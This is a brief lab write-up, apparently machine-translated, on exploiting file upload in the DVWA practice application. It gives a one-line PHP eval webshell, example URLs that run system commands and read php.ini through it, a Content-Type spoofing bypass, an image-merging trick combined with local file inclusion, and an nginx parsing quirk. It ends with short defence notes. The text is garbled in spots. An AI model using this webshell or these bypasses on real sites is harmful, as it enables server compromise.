File Upload-Notes

Source: Internet
Author: User
Tags phpinfo

Site common features, such as: Upload avatar Low upload successful phpinfo.php access to execute http://192.168.3.88/dvwa/hackable/uploads/phpinfo.php exploit: in PHP, for example, Can upload a sentence webshellcmd.php<?php@eval ($_get[' cmd '); > can be used to execute various PHP functions and commands. For example: Http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=phpinfo (); http://192.168.3.88/dvwa/hackable/uploads/ Cmd.php?cmd=system (dir); Http://192.168.3.88/dvwa/hackable/uploads/cmd.php?cmd=system (' Type c:\\phpstudy\\www\\ Dvwa\\php.ini '); Medium.When uploading a non-picture file, modify the Content-type:image/jpeg in the sent POST request package by changing the package HighWe try to discover that the server validates the file suffix, file type, and file contents of the files we upload. Use the DOS command to create an inside image and merge the files we want to execute with the normal images. Copy test.jpg/b+ phpinfo.txt/a phpinfo.jpg call execution with a local file containment vulnerability Http://192.168.3.88/dvwa/vulnerabilities/fi/?page=file :///c:\phpstudy\www\dvwa\hackable\uploads\cmd.jpg uses Nginx parsing vulnerability to view Php-ini configuration files using Phpstudy simulation test environment cgi.fix_pathinfo=1 Whether it is 1 if there is a malformed parsing xxx.xxx/xxx.php before a file exists, it will be interpreted as a PHP file to protect: The user uploaded image compression rebuild, file Rename, store directory permissions settings, storage directory and site separation

File Upload-Notes

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.